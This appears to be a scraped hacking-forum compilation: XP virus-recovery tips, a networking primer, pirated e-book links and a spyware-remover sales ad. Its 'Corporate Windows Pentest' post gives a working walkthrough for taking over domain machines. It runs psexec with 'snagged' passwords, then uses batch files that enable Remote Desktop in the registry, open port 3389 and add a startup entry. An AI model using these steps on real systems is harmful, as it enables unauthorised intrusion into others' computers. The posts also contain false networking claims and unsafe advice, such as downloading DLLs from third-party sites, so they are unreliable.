Net Geeky

XP Security Basics

Let's say you we're hacked and all your data is gone,what to do?
I will be teaching you how to help yourself to recover from that corruption,and how to prevent that from happening again.

I. Recovering
II.Preventing

I.Recovering

I.I.Dangerous Viruses
I.II.Blue Screen
I.III.Error Messages
I.IV.Missing DLL
I.V.Minor viruses
I.VI.Very Dangerous Viruses

I.I.Dangerous Viruses

If you are reading this thread then you must be a member or guest on Greyhat-Security,that means you like downloading stuff,off the web. But you never know if the stuff you download are clean and have no viruses. But then one day,you download something and you reboot and then ,what do you know? Some files are created by themselves,some files can't be accessed. What to do? Go to Google and download an Anti-Virus,here are some links:
AVG-http://free.grisoft.com/
Avast-www.avast.com/eng/download-avast-home.htm
Kaspersky-www.kaspersky.com/downloads
NOD32-www.eset.com/download/

When you download,install,update and run a full scan. Your windows is now cleaned from viruses. To make sure,scan again.

Then download Spyware Doctor here:
http://www.pctools.com/spyware-doctor/
Download,Install,Update and run a full scan. Your windows is now cleaned from Spywares.

Then download a malware remover:
http://www.softpedia.com/get/Antivirus/M...nner.shtml
Download,Install,Update and run a full scan. Your windows is now cleaned from malwares.

Then download a trojan remover:
http://www.softpedia.com/get/Antivirus/T...over.shtml
Download,Install,Update and run a full scan. Your windows is now cleaned from trojans.

YOUR WINDOWS IS NOW CLEAN.

Now when you finish the above,use Disk Cleanup to delete anything unwanted. And then run Disk Defragmenter. Your windows is now back to normal.

I.II.Blue Screen
Blue screen a.k.a Blue screen of death is an error that windows xp has. It is mostly there when you have a system error.And that blue screens saves the day. It helps you prevent any damage to your computer by shutting it down. How to recover from Blue screens:
Get your windows xp installation cd Stash it inside your CD-Rom and restart computer. And boot from the cd. When a blue window i think will come up click R Type in Quote:
CHKDSK /R

and enter. When the repair process is done type in Quote:
BOOTCFG

.
When that is finished restart and keep your finger on F8. When a black windows comes up with option select Quote:
Last Known Good Configuration

Your windows is now recovered.

I.III.Error messages
Some error messages show at startup and some when starting an application. I will talk about both. For the error messages at startup is probably a missing DLL,I will talk about that later. And sometimes it a unknown message sent to a window component like autoexec.bat or command.com(this also will be discussed in the Missing DLL part) For starting an application sometimes it's the setup file,maybe a file wasn't completely installed use Reinstall in the Add/Remove Programs,but some programs don't have Reinstall so just Uninstall and install again,if the problem persists then it is the download link. Try downloading from another source.
Like if you are going to download for example LimeWire.Don't download from http://www.download.com but from http://www.limewire.com .
Always better to download from original site.

I.IV.Missing Dlls
When something bad happened a DLL is corrupted. Dll's are mostly in System32. So find your corrupted DLL(To find the corrupted DLL take a look at the startup erro,you should see the dll name there. When you find your DLL go to :
http://www.dll-files.com/
And search for it. When you find it download and replace it with the old DLL.

Then download registry booster 2 here:
http://www.liutilities.com/products/registrybooster/
And run a full scan. That should clear things out. Then go to RUN and type drwatson.exe, drwtsn32.exe or dwwin.exe depends on your windows version. And follow this Wiki:

Quote:
The information obtained and logged by Dr. Watson is the information needed by technical support personnel to diagnose a program error for a computer running Windows. A text file (Drwtsn32.log) is created whenever an error is detected, and can be delivered to support personnel by the method they prefer. A crash dump file can also be created, which is a binary file that a programmer can load into a debugger. Dr. Watson can be made to generate more exacting information for debugging purposes if the appropriate symbol files are installed and the symbol search path (environment variable) is set. When a program error occurs in Windows, the system searches for a program error handler. A program error handler deals with errors as they arise during the running of a program. If the system does not find a program error handler, the system verifies that the program is not currently being debugged and considers the error to be unhandled. The system then processes unhandled errors by looking in the registry for a program error debugger for which Dr. Watson is the default. A third-party debugger can also be used in place of Dr. Watson. The Watcom C compiler includes a similar crash-analysis tool named "Dr. Watcom"

I.V.Minor Viruses
When you have small,spammy,annoying viruses a system restore might be your best bet.

I.V1.Very Dangerous Viruses.
Very dangerous viruses cannot be cleaned with a Anti-Virus,but only with a format. Here I will teach you how to format:
First make a backup and stack all your needed files inside.
Then stash your Windows Xp installation cd inside the CD-Rom.
Restart and boot from CD.
A blue window will appear and look down you will see different
options.Don't click any,be patient and you will see that the cd is
running some files you will see name(like sound device...)When that is
done you will see options,Click enter.
A new window will appear.You can see all your drives/partition.Choose
your system drive , or the drive that you want to format and click
"D"(sometimes you only have C:/ and no D:/ so the step before is not
needed).New window,press L.
You are back to the previous screens,but instead of C:/ \ D:\ you have
sizes ( e.g 1515MB ),highlight the size and click C.New window,click
enter.
Previous Window.You will have something that looks like this : “C: Partition1..."Highlight and press enter.
New window choose NTFS(this is just my recommendation),there will be a 4 options i think, quick and full i don't know,but don't choose quick choose the other one and click enter. That will format. Than there is the configuring it's up to you. When you finish configuring install the windows drivers and that's it a new windows.

II.Preventing
So you just been saved from the viruses and now you don't want to make the same mistakes again? Here is how.
Always use the internet using a proxy , it will be almost impossible to connect to you. Then change IPs every now and then.
Tick your firewall on. And every 2 weeks update your windows. Always use an Anti-Virus. Check your download links. Always use fake Email-Address , and Fake Name. Disable telnet/NetBIOS. Never download hacking tools that you think might be viruses. Prevent yourself from making batches and saving them as something.bat( because if they are destructive you don't know when it will
automatically launch. DO NOT USE P2P for softwares,maybe for music. If a friend tells you I created a similar website to Myspace/Gmail/Hotmail.. Don't accept it's probably phishing. Make sure that you never log on MSN at your friends house as it might be keylogged.

Corporate Windows Pentest

In most corporate environments all the XP boxes are on a domain, which means their credentials are just flying around all over. To crack these passwords is difficult because of the kereberos encryption scheme, however most people's personal passwords, to things like myspace, etc, will not be encrypted, and sometimes these passwords are the same as their domain credentials.

Traditionally on machines in a corporate network RDP is enabled but, if it isn’t then you can use psexec to get it set up.

http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

Open the cmd prompt by hitting start run, then typing cmd then hitting enter.

Type this into the cmd prompt(make sure you are in the directory that psexec is in when you do this, you could add psexec to the system path, if you got in the habit of using it:

psexec \\machinename –u username cmd

It will prompt you for a password which hopefully you have previously snagged. Username should be the username not the word. The cmd in the command above is saying to execute a cmd prompt, which will appear on your machine as a standard cmd, but it is linked to their machine. To verify you are connected to their machine type hostname and make sure their machine name is shown, not yours. PSEXEC has an option for uploading a file when you use it but, I haven't had the best of look with it. What I do is use the net command to map a drive to your computer from the other computer. I.E. :

Net use r: \\yourmachinename\public /persistant:no

Will map the drive to your computers shared folder named public. So now you can just type.(Remember this is in the remote machines cmd not your own)

Z:

So you can run a silent install of vnc for some sweet gui action or if you know no one is actually in front of the computer you can create these three bat files. And run first.bat.

Make three .bat files in the same directory on a thumb drive:

first.bat

code:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
mkdir c:\batter
copy second.bat c:\batter
copy third.bat c:\batter
cd %USERPROFILE%\Start Menu\programs\Startup\start.bat
copy c:\batter\second.bat start.bat
shutdown -r -t 0

second.bat

code:

netsh firewall set portopening tcp 3389 "RemoteDesktop"
cd c:\batter
third.bat

third.bat

code:

cd %USERPROFILE%\Start Menu\programs\Startup\
del start.bat

This enables remote desktop on that machine and you can now remote in.

E-book: Make Joomla Templates in 5 Easy Steps

That's right this is an absolute beginners guide to creating your own Joomla templates. You don't need any fancy software, or graphic design skills. You don't need to know anything about HTML, PHP or programming, just an open mind and a willingness to learn. Make Joomla Templates in 5 Easy Steps This incredible Beginners Guide is just that: * A 91 page instructional e-book * Over 100 step by step visual illustrations * 5 easy steps to create your own Joomla template. Download Link: http://rapidshare.com/files/110300939/Make_a_Joomla_Template_in_5_Easy_Steps.rar

E-Book: Hacking-The_Art_of_Exploitation

Its a really nice book, i thought it would be nice to share. Hacking is the art of creative problem solving, whether used to find an unconventional solution to a difficult problem or to exploit holes in sloppy programming. Many people call themselves hackers, but few have the strong technical foundation that a hacker needs to be successful. Hacking: The Art Of Exploitation explains things that every real hacker should know. While many hacking books show you how to run other people’s exploits without really explaining the technical details, Hacking: The Art Of Exploitation introduces you to the spirit and theory of hacking as well as the science behind it all. By learning some of the core techniques and clever tricks of hacking, you will begin to understand the hacker mindset. Once you learn to think like a hacker, you can write your own hacks and innovate new techniques, or you can thwart potential attacks on your system.

Download Link: http://rapidshare.com/files/63948662/Hacking-The_Art_of_Exploitation.rar

Hacking Basics Part 1

INTRODUCTION

I. What is hacking?

If you use the term 'hacking' in public areas, thoughts that will run through the minds of the people around you will be: "People who break into computers. People who steal private information. Criminals, Terrorists.", and things along those lines. This is because the term 'hacking' has been twisted by ignorance. The same ignorance that informs us of 'accurate' news every day. The same ignorance that lies about a term so pure just to make it self seem stronger. This ignorance has been fed into the minds of the people around us, almost spoon-fed. The public is a mindless pawn. It will believe whatever this ignorance feeds it. I say we take a stand. I say we wage war with ignorance.

Why?, you may ask. Why would all of these people twist something like that? It's because it was US who embraced the Information Age. It was US who felt right, understood and accepted, and at home through our phone lines. Not them. They were too busy feeding ignorance to the ignorant. They would rather pollute a term and stereotype all hackers as criminals than actually hear our sides of the stories or see our views on everything.

II. What is a hacker?

To me, a hacker is anyone willing to push farther and farther for the gain of knowledge and for the experience. This doesn't have to be in the technology area necessarily, however the term 'hacker' in this tutorial will be directly associated with computers.

Among hacker ethics, there are two types of hackers: white hats and black hats. Some even consider the 'gray hat', which is in between. A white hat is what a hacker truly i. They are in it for the knowledge, the experience, and because the Internet feels like a real home; like a place where they belong. They feel as though they know everyone on the Internet, even though they will probably never meet in person. Black hats, on the other hand, are not real hackers. They are people who will do everything just to be destructive. They are one reason that caused the pollution of the term 'hacker'. Many black hats are script kiddies, or 'skiddies'. This is a term used to identify people who download programs and use them for what they want to do. All they typically know is what to 'click' and what to 'type', but not how everything works. They will use these programs to cause damage and they won't even know what is going on. All they know is where to click to 'hack'.

III. Were do I start?

You may be a beginner hacker. You may be completely new to this, but that is ok. That is the reason why this tutorial was born. As long as you are willing to learn, we are willing to teach. But do note, you must 'crawl before you can walk'. What I am saying is that you need to learn the basics first. This means you SHOULDN'T join a website and immediately ask someone to tell you how to hack a website or a computer. Most likely, you will get no reply you are looking for, and you will end up getting looked down upon.

By the end of this tutorial, you should have a basic understanding of the basics. Feel free to ask questions if you get confused on anything though. Once you understand the basics, everything else will come to you easily.

THE BASICS

I. Networking

Millions of people surf the web each day, however, a small percentage of those people know how the Internet works.

First off, realize that the web and the Internet are two SEPARATE things. The web is all the content on the Internet that can be viewed, modified, shared, etc. through HTTP (Port 80). We will talk about ports later. The Internet is all of the networks in the world and all the ports put together.

-LANs and WANs

There are two types of networks, LANs and WANs. A LAN (Local Area Network) is a network in one area. LANs are typically on the same internet connection (a T1 or T3, depending on how rich the bastards are), and have things such as file and printer sharing enabled. A WAN (Wide Area Network) is a group of inter-connected LANs. Ultimate WAN is the Internet. Think of it like this: All the computers in your school make up a LAN. That LAN may share different drives for students and/or teachers to access and may also have numerous printers shared. Also, that LAN may have a few smaller LANs within it (i.e. A computer lab and a library). All the schools' LANs make up your school district's WAN.

-TCP/IP

You probably use the web a lot, as do milions of others. But do you know what happens internally, or how you are able to use the Internet?

The fact is that there are many different things that occur just when you check your email, make a blog post, or even visit a website. Most of the responsibility of your ability to use the Internet lies with TCP/IP.

While I'm not going to give you a full tutorial of TCP/IP (you can view one here.) simply because I don't want to confuse you, I will explain the basics. TCP/IP (Transmission Control Protocol/Internet Protocol) is all the different processes that occur when the Internet is accessed.

When a program transfers data between your computer and the Internet, it uses TCP/IP. First, it sends the request to your TCP/IP layer. Your TCP/IP layer then takes the data, breaks it down into packets, transfers it through the modem to the cables, and sends it to the destination. The receiving machine's TCP/IP layer then takes the data off the cable, compiles the packets into user-readable data, and then displays it. All of this is done in a matter of seconds.

-IP Addresses

Fingerprints. Everyone has them. They help identify criminals and help to solve cases. The familiarity of this term mostly makes you think of that, but in the technology world, you should consider computer fingerprints.

IP Addresses are computer fingerprints. They function just like human fingerprints in a way. They help to solve computer crimes.

But there is a way that human fingerprints and computer fingerprints differ: If you find someone's fingerprint, you can't simply track them down and attack them. With a computer fingerprint, this can be accomplished.

IP Addresses are a set of four numbers ranging from 0 to 255 that are separated by periods (i.e. 65.72.73.81). There are two types of IP Addresses: static and dynamic. Static IPs (or external IPs) never change. They are assigned to connections by ISPs. Dynamic IPs (or internal IPs) are changeable, and they are assigned to devices on a LAN. Note that most computer IPs begin with '192.168' (i.e. 192.168.1.1)

With an IP, someone can find where you live, your network information (ISP, hostname, etc.), and they can even attack you (in cyber terms, not physically, (unless they come to your house O_o))

-Ports

Ports are how all your data transactions are organized. Without ports, you would get data errors, overflows, etc..

There are two types of ports: physical and virtual. Physical ports are on the back of your computer. They require human/physical interaction to be modified. Virtual ports, however, do not require human interaction, although many interactions involve a human.

There are 65, 535 ports. Ports from 0 to 1023 are not allowed for use by programmers. These ports come pre-defined on each computer. They are for common protocols such as HTTP (web), FTP (File Transferring), and Telnet. After ports 1023, the rest can be used for pretty much anything (even more than one protocol/app, as long as it is one at a time.

List of Well Known Ports

# Description
1 TCP Port Service Multiplexer (TCPMUX)
5 Remote Job Entry (RJE)
7 ECHO
18 Message Send Protocol (MSP)
20 FTP -- Data
21 FTP -- Control
22 SSH Remote Login Protocol
23 Telnet
25 Simple Mail Transfer Protocol (SMTP)
29 MSG ICP
37 Time
42 Host Name Server (Nameserv)
43 WhoIs
49 Login Host Protocol (Login)
53 Domain Name System (DNS)
69 Trivial File Transfer Protocol (TFTP)
70 Gopher Services
79 Finger
80 HTTP
103 X.400 Standard
108 SNA Gateway Access Server
109 POP2
110 POP3
115 Simple File Transfer Protocol (SFTP)
118 SQL Services
119 Newsgroup (NNTP)
137 NetBIOS Name Service
139 NetBIOS Datagram Service
143 Interim Mail Access Protocol (IMAP)
150 NetBIOS Session Service
156 SQL Server
161 SNMP
179 Border Gateway Protocol (BGP)
190 Gateway Access Control Protocol (GACP)
194 Internet Relay Chat (IRC)
197 Directory Location Service (DLS)
389 Lightweight Directory Access Protocol (LDAP)
396 Novell Netware over IP
443 HTTPS
444 Simple Network Paging Protocol (SNPP)
445 Microsoft-DS
458 Apple QuickTime
546 DHCP Client
547 DHCP Server
563 SNEWS
569 MSN
1080 Socks

II. Your Operating System

The operating system of your computer is how you interact with your computer. The layer you see is a Graphical User Interface (GUI). Under that, there is the shell and then the kernel. The GUI layer sends commands to the shell, which is the interface (with no graphics) of the kernel, which is basically the 'brain' of your computer. The kernel then executes the command and sends output back to the shell, which sends it to the GUI, which displays it. This is done by the scripts of your operating system and the scripts of whatever program/tool you are using.

I.E.: You double-click on Notepad. Your GUI layer calls up your shell and says, "Hey, this kid wants to open Notepad.". The shell relays the message with the proper command (which is 'start notepad') to the kernel, which runs through all the scripts required to open Notepad, and then opens it. It calls the shell and says, "Done. Tell the GUI layer to open such and such scripts to display it interactively.". They shell relays this to the GUI, which displays an interactive Notepad window.

Selling Spyware QuickFix Source code

I am selling the source code of my program Spyware QuickFix, it is was supposed to be realeased as a commercial product. But since i got busy in some other projects i' m selling it now.

Now with Full Source Code!
Only ~~100~~ 89 copies left

For the first time ever, you can now get master resell rights to this hot new software! That's right, Now you can create your own spyware software with your name on it, and start selling it, That's right, sell it and keep 100% of the profits.

Software License:

[YES] Includes FULL Source Code (Delphi7).
[YES] Includes 10,000+ of spywares, keyloggers, trojans database file.
[YES] Includes Spywares Database Editor with source code, so you can update your databse.
[YES] Includes salespage and graphics.
[YES] Sales letter can be edited w/your own name put on it.

For further details, please check http://spykesoft.com/QuickFix/